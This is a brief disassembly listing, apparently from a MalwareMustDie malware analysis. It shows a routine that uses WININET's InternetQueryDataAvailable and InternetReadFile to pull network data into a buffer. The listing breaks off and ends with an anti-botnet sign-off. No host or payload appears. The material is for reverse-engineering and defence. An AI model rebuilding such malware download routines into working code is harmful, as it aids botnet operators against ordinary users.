- 0040A55E call 0040B208h memset@MSVCRT.DLL (Import, 0 Params) target: 0040B208
- 0040A563 add esp, 10h
- 0040A566 push ebx xref: 0040A5D5
- 0040A567 push ebx
- 0040A568 lea eax, dword ptr [ebp-10h]
- 0040A56B push eax
- 0040A56C push dword ptr [ebp+08h]
- 0040A56F call dword ptr [0040C26Ch] "InternetQueryDataAvailable@WININET.DLL" (Import, 4 Params)
- 0040A575 test eax, eax
- 0040A577 je 0040A5E3h target: 0040A5E3
- 0040A579 cmp dword ptr [ebp-10h], ebx
- 0040A57C je 0040A5E3h target: 0040A5E3
- 0040A57E push dword ptr [ebp-10h]
- 0040A581 call dword ptr [0040C2E8h] malloc@MSVCRT.DLL (Import, 0 Params)
- 0040A587 pop ecx
- 0040A588 lea ecx, dword ptr [ebp-0Ch]
- 0040A58B push ecx
- 0040A58C push dword ptr [ebp-10h]
- 0040A58F mov dword ptr [ebp+0Ch], eax
- 0040A592 push eax
- 0040A593 push dword ptr [ebp+08h]
- 0040A596 call dword ptr [0040C270h] "InternetReadFile@WININET.DLL" (Import, 4 Params)
- 0040A59C test eax, eax
- 0040A59E je 0040A5D9h target: 0040A5D9
- 0040A5A0 cmp dword ptr [ebp-0Ch], ebx
- 0040A5A3 je 0040A5D9h target: 0040A5D9
- 0040A5A5 mov eax, dword ptr [ebp-08h]
- 0040A5A8 mov edi, esi
- 0040A5AA sub edi, eax
- 0040A5AC cmp dword ptr [ebp-0Ch], edi
- 0040A5AF jnc 0040A5B4h target: 0040A5B4
- 0040A5B1 mov edi, dword ptr [ebp-0Ch]
- 0040A5B4 mov ecx, dword ptr [ebp+10h] xref: 0040A5AF
- 0040A5B7 push edi
- 0040A5B8 push dword ptr [ebp+0Ch]
- 0040A5BB add ecx, eax
- 0040A5BD push ecx
- [...]
- ------
- #MalwareMustDie!
- "Thou shalt not make malware Botnet!"